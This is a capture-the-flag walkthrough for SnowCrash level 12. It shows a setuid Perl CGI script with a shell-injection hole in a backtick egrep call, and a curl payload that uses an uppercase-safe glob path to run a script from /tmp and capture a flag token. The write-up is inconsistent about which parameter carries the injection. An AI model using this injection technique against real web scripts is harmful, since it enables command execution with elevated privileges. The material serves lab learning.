# Level 12

## how to login

username: level12

password: fa6v5ateaw21peobuub8ipe6s

## Goal

run `getflag` as user `flag12`

## Actually doing something

```bash
level12@SnowCrash:~$ ll
total 16
dr-xr-x---+ 1 level12 level12  120 Mar  5  2016 ./
d--x--x--x  1 root    users    340 Aug 30  2015 ../
-r-x------  1 level12 level12  220 Apr  3  2012 .bash_logout*
-r-x------  1 level12 level12 3518 Aug 30  2015 .bashrc*
-rwsr-sr-x+ 1 flag12  level12  464 Mar  5  2016 level12.pl*
-r-x------  1 level12 level12  675 Apr  3  2012 .profile*
```

Perl again...

```perl
level12@SnowCrash:~$ cat level12.pl 
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $nn = $_[1];
  $xx = $_[0];
  $xx =~ tr/a-z/A-Z/; 
  $xx =~ s/\s.*//;
  @output = `egrep "^$xx" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $nn) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }    
}

n(t(param("x"), param("y")));
```
a bit more involed, lets try to make it more pretty

```perl
#!/usr/bin/env perl
# localhost:4646
use CGI qw{param};
print "Content-type: text/html\n\n";

sub t {
  $arg2 = $_[1];
  $arg1 = $_[0];
  $arg1 =~ tr/a-z/A-Z/; 
  $arg1 =~ s/\s.*//;
  @output = `egrep "^$arg1" /tmp/xd 2>&1`;
  foreach $line (@output) {
      ($f, $s) = split(/:/, $line);
      if($s =~ $arg2) {
          return 1;
      }
  }
  return 0;
}

sub n {
  if($_[0] == 1) {
      print("..");
  } else {
      print(".");
  }
}

n(t(param("x"), param("y")));
```

when looking at this, we basically spot an `egrep` meaning that we have a shell injection.

lets look at what is given to this string

first of all, we get called with two argument, lets call them by their http parameter names `x` and `y`

in the script they are also named `arg1` for `x` and `arg2` for `y`

arg2 doesn't matter for us, so lets ignore it

arg1 is converted to uppercase, and then we only keep erverything up to the first space;

so we want to execute something like last time, meaning that we want to instert something to stop the current comment
`";cmdhere`

but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase...

Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script

```bash
level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag
..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr
```